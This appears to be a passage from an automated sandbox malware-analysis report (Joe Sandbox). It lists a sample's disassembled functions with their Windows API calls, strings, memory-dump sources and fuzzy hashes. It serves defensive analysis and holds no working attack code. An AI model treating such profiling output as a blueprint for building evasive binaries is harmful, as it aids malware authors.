            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
            • String ID:
            • API String ID: 429561992-0
            • Opcode ID: 840a1360b860ffb36612c73c743325e55f626d8a96a1f655293730ea91c5b5ee
            • Instruction ID: 5b957b9a037ea931291d6a66ea7a53a0327177a5a82c1acb3a4b994158e31b9f
            • Opcode Fuzzy Hash: 840a1360b860ffb36612c73c743325e55f626d8a96a1f655293730ea91c5b5ee
            • Instruction Fuzzy Hash: 8BC151B1608315AFD740DF68C88492BBBE9FF89748F00495DF98A9B250DB35ED05CB92
            Function 01017A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
            Download Yara Rule
            APIs
            • CoInitialize.OLE32(00000000), ref: 01017AF3
            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 01017B8F
            • SHGetDesktopFolder.SHELL32(?), ref: 01017BA3
            • CoCreateInstance.OLE32(0103FD08,00000000,00000001,01066E6C,?), ref: 01017BEF
            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 01017C74
            • CoTaskMemFree.OLE32(?,?), ref: 01017CCC
            • SHBrowseForFolderW.SHELL32(?), ref: 01017D57
            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 01017D7A
            • CoTaskMemFree.OLE32(00000000), ref: 01017D81
            • CoTaskMemFree.OLE32(00000000), ref: 01017DD6
            • CoUninitialize.OLE32 ref: 01017DDC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
            • String ID:
            • API String ID: 2762341140-0
            • Opcode ID: d5ad4a6b27fcd4017a3ab490f234743719c2ffa1d33eafc510f996b7c866183d
            • Instruction ID: 9011f71eef5d69d27a83554c699a6c0178658d79ea8c3bd7b835515d53aa9e12
            • Opcode Fuzzy Hash: d5ad4a6b27fcd4017a3ab490f234743719c2ffa1d33eafc510f996b7c866183d
            • Instruction Fuzzy Hash: E3C14A75A00109AFDB14DFA4C884DAEBBF9FF48314B148099F956EB261CB35EE41CB90
            Function 0103541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01035504
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01035515
            • CharNextW.USER32(00000158), ref: 01035544
            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01035585
            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0103559B
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010355AC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$CharNext
            • String ID:
            • API String ID: 1350042424-0
            • Opcode ID: 31866a36d9932ed7f5a59c996ff7824c05d27769f66d4825ebef974a584fe117
            • Instruction ID: b48abc78f1973ea8313cffdcdc14d4ff78f20a31abab0461a517eee43de0875d
            • Opcode Fuzzy Hash: 31866a36d9932ed7f5a59c996ff7824c05d27769f66d4825ebef974a584fe117
            • Instruction Fuzzy Hash: C5618171A00209AFEF20CF55CC849FE7BBDEB8A724F004186F6A5A72A0D7759641DB60
            Function 00FFFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
            Download Yara Rule
            APIs
            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FFFAAF
            • SafeArrayAllocData.OLEAUT32(?), ref: 00FFFB08
            • VariantInit.OLEAUT32(?), ref: 00FFFB1A
            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FFFB3A
            • VariantCopy.OLEAUT32(?,?), ref: 00FFFB8D
            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FFFBA1
            • VariantClear.OLEAUT32(?), ref: 00FFFBB6
            • SafeArrayDestroyData.OLEAUT32(?), ref: 00FFFBC3
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FFFBCC
            • VariantClear.OLEAUT32(?), ref: 00FFFBDE
            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FFFBE9
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
            • String ID:
            • API String ID: 2706829360-0
            • Opcode ID: 35aedb968055f559735db7842cb11db0cb036acdd642ac7f918e330deafcd42c
            • Instruction ID: 5a135e751a7dd1af74f700414452caaab7c22b4a6fed41de32c3f1bc8c791d1f
            • Opcode Fuzzy Hash: 35aedb968055f559735db7842cb11db0cb036acdd642ac7f918e330deafcd42c
            • Instruction Fuzzy Hash: 22418F35A002199FDB10DF64C8549BEBBB9EF48354F008029EA46E7261CB39E945DFA0
            Function 0102055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
            Download Yara Rule
            APIs
            • WSAStartup.WSOCK32(00000101,?), ref: 010205BC
            • inet_addr.WSOCK32(?), ref: 0102061C
            • gethostbyname.WSOCK32(?), ref: 01020628
            • IcmpCreateFile.IPHLPAPI ref: 01020636
            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 010206C6
            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 010206E5
            • IcmpCloseHandle.IPHLPAPI(?), ref: 010207B9
            • WSACleanup.WSOCK32 ref: 010207BF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
            • String ID: Ping
            • API String ID: 1028309954-2246546115
            • Opcode ID: c83d54e83c96f5dee00b41b81dd945e29bbc021094a107452ef414c3a1631594
            • Instruction ID: 9275acbc0aa69efa29293a7cd45db0c759c88c4400affd16ad12eacf6c9ecaac
            • Opcode Fuzzy Hash: c83d54e83c96f5dee00b41b81dd945e29bbc021094a107452ef414c3a1631594
            • Instruction Fuzzy Hash: 2F91C0759043119FE320CF19C888F1ABBE4BF49318F0485A9F5A99B6A6C735EC45CF81
            Function 01028CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharLower
            • String ID: cdecl$none$stdcall$winapi
            • API String ID: 707087890-567219261
            • Opcode ID: 3946c950e7be962e63724f3a28b70e36340b43ef31d14cb6df1781faa2cca653
            • Instruction ID: 686e9065c7e250f9ecb40e331a693d185ad16d71b11b00a66a4467e4ac9b1ab8
            • Opcode Fuzzy Hash: 3946c950e7be962e63724f3a28b70e36340b43ef31d14cb6df1781faa2cca653
            • Instruction Fuzzy Hash: 3E51F436A001369BCF14EF6CC9409BEB7E5BF64324B20826AF9A6E7285D735DD44C790
            Function 0102372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
            Download Yara Rule
            APIs
            • CoInitialize.OLE32 ref: 01023774
            • CoUninitialize.OLE32 ref: 0102377F
            • CoCreateInstance.OLE32(?,00000000,00000017,0103FB78,?), ref: 010237D9
            • IIDFromString.OLE32(?,?), ref: 0102384C
            • VariantInit.OLEAUT32(?), ref: 010238E4
            • VariantClear.OLEAUT32(?), ref: 01023936
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
            • API String ID: 636576611-1287834457
            • Opcode ID: afb38d6e4d114d9312e56b8844057f5955e8f25b9405d9b5e88a1f0ee31514a4
            • Instruction ID: 29b8df8643486592d757ac92295f4d43c8daccdaab94feb8d2a4e20e9dcc5c3d
            • Opcode Fuzzy Hash: afb38d6e4d114d9312e56b8844057f5955e8f25b9405d9b5e88a1f0ee31514a4
            • Instruction Fuzzy Hash: 42617D71608311AFD721DF64C848B6ABBE8BF49714F00485AF9C59F291D7B8E948CB92
            Function 01013388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
            Download Yara Rule
            APIs
            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 010133CF
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 010133F0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LoadString$_wcslen
            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
            • API String ID: 4099089115-3080491070
            • Opcode ID: 1a316fa91cad5b5d4d208e4778cfae432df791dc427378b26447f829d823b126
            • Instruction ID: b3a958fbb44f09a42195e2ae083596e5d1a088e456e999f21d96f0f92a5baf74
            • Opcode Fuzzy Hash: 1a316fa91cad5b5d4d208e4778cfae432df791dc427378b26447f829d823b126
            • Instruction Fuzzy Hash: F751C0B1C0020AAADF15EBA1CD42EEEB778BF05340F108065F145B6092EF3A2F58DB60
            Function 0100B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharUpper
            • String ID: APPEND$EXISTS$KEYS$REMOVE
            • API String ID: 1256254125-769500911
            • Opcode ID: 724ceebf5820a6e160f08f3a84932d4f87efd1861ee237bdec7be2145cb49366
            • Instruction ID: af91fc22b88be2cb6031a7b554ce1385d72080dfa92767d723dfafc97fd31ade
            • Opcode Fuzzy Hash: 724ceebf5820a6e160f08f3a84932d4f87efd1861ee237bdec7be2145cb49366
            • Instruction Fuzzy Hash: 4C415936A000278BEB625F7DCC905BE7BE5BF54A54F144269E4A1D72C1F73AC981C390
            Function 01015393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 010153A0
            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 01015416
            • GetLastError.KERNEL32 ref: 01015420
            • SetErrorMode.KERNEL32(00000000,READY), ref: 010154A7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Error$Mode$DiskFreeLastSpace
            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
            • API String ID: 4194297153-14809454
            • Opcode ID: 90c484080600a23dac117394b4d0f8153a0caccf41478fe8568589cd6b4896c6
            • Instruction ID: ee5c6076ec732aacb96a47bb8f66f4c9b085de4019a64e6426e6afcb23d702aa
            • Opcode Fuzzy Hash: 90c484080600a23dac117394b4d0f8153a0caccf41478fe8568589cd6b4896c6
            • Instruction Fuzzy Hash: FF31B275A402049FD711DF68C884BAABBF8FF86309F048095E585DF29ADB79DD42CB90
            Function 01033C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
            Download Yara Rule
            APIs
            • CreateMenu.USER32 ref: 01033C79
            • SetMenu.USER32(?,00000000), ref: 01033C88
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01033D10
            • IsMenu.USER32(?), ref: 01033D24
            • CreatePopupMenu.USER32 ref: 01033D2E
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01033D5B
            • DrawMenuBar.USER32 ref: 01033D63
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$CreateItem$DrawInfoInsertPopup
            • String ID: 0$F
            • API String ID: 161812096-3044882817
            • Opcode ID: 11bf96c9faff1d757c3f1e1cfffc1eda9e29f22a70f71f850e72299977f6712b
            • Instruction ID: 3501ab88b854533a56e70479e7d4d9b9ab9b54714cc0675c69c95ff033c377b8
            • Opcode Fuzzy Hash: 11bf96c9faff1d757c3f1e1cfffc1eda9e29f22a70f71f850e72299977f6712b
            • Instruction Fuzzy Hash: 3D416075A01209AFEB24DF54E984A9A7BF9FF89350F140059F985AB390D735A910CB50
            Function 01033A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01033A9D
            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01033AA0
            • GetWindowLongW.USER32(?,000000F0), ref: 01033AC7
            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01033AEA
            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01033B62
            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01033BAC
            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01033BC7
            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 01033BE2
            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01033BF6
            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 01033C13
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$LongWindow
            • String ID:
            • API String ID: 312131281-0
            • Opcode ID: bc4153f7671a4c6c9231708ddc8a5a85fc3a9c90810bee34ee06eb805546310e
            • Instruction ID: ad68e2337b2214b37487f7a1a1bde0aa772111cf441123279a1f2e62c9250360
            • Opcode Fuzzy Hash: bc4153f7671a4c6c9231708ddc8a5a85fc3a9c90810bee34ee06eb805546310e
            • Instruction Fuzzy Hash: 88617975A00248AFDB21DFA8CC81EEE77F8FB49700F100199FA95EB291C774A945DB60
            Function 0100B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentThreadId.KERNEL32 ref: 0100B151
            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B165
            • GetWindowThreadProcessId.USER32(00000000), ref: 0100B16C
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B17B
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100B18D
            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B1A6
            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B1B8
            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B1FD
            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B212
            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0100A1E1,?,00000001), ref: 0100B21D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
            • String ID:
            • API String ID: 2156557900-0
            • Opcode ID: 7ed6c14509bd1f94c3576fcfa5e89a48cf32d948f890094a83c1a09bedbe45fa
            • Instruction ID: 0a21457b8d1ab09f4319d98645cb076e6c3cde27241b6e9501e3733df8d05308
            • Opcode Fuzzy Hash: 7ed6c14509bd1f94c3576fcfa5e89a48cf32d948f890094a83c1a09bedbe45fa
            • Instruction Fuzzy Hash: 5B31D079900204BFFB379F28D948BAD7BADBB55311F104445FA80EA1C4D7B9A8409FA0
            Function 00FD2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00FD2C94
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FD2CA0
            • _free.LIBCMT ref: 00FD2CAB
            • _free.LIBCMT ref: 00FD2CB6
            • _free.LIBCMT ref: 00FD2CC1
            • _free.LIBCMT ref: 00FD2CCC
            • _free.LIBCMT ref: 00FD2CD7
            • _free.LIBCMT ref: 00FD2CE2
            • _free.LIBCMT ref: 00FD2CED
            • _free.LIBCMT ref: 00FD2CFB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 01ebc913f1a2c76ecbaa9c291c0cf171d64e40730370f356ea09dae3c33e3fdd
            • Instruction ID: f8c441fc676015fdb629e6195f89d7ab76cf45b791467ba2b98a153324adb799
            • Opcode Fuzzy Hash: 01ebc913f1a2c76ecbaa9c291c0cf171d64e40730370f356ea09dae3c33e3fdd
            • Instruction Fuzzy Hash: F5119476500108AFCB42EF58DC92CDD3BB6BF15350F4544A6F9485B322D635EA50BB91
            Function 00FA1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
            Download Yara Rule
            APIs
            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FA1459
            • OleUninitialize.OLE32(?,00000000), ref: 00FA14F8
            • UnregisterHotKey.USER32(?), ref: 00FA16DD
            • DestroyWindow.USER32(?), ref: 00FE24B9
            • FreeLibrary.KERNEL32(?), ref: 00FE251E
            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FE254B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
            • String ID: close all
            • API String ID: 469580280-3243417748
            • Opcode ID: 161bbc7d13d068d2b95a20ca16a994776282a65c5ff519cf25848654552dc7a8
            • Instruction ID: 00cd3a83f4b5905e46713dacb164cd07ad195d03447490f7409a1989f78f70c4
            • Opcode Fuzzy Hash: 161bbc7d13d068d2b95a20ca16a994776282a65c5ff519cf25848654552dc7a8
            • Instruction Fuzzy Hash: 8AD1D671B01212CFDB19EF15C994B69F7A8BF06710F1542AEE44AAB251DB34EC12EF50
            Function 01017DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
            Download Yara Rule
            APIs
            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01017FAD
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01017FC1
            • GetFileAttributesW.KERNEL32(?), ref: 01017FEB
            • SetFileAttributesW.KERNEL32(?,00000000), ref: 01018005
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018017
            • SetCurrentDirectoryW.KERNEL32(?), ref: 01018060
            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 010180B0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
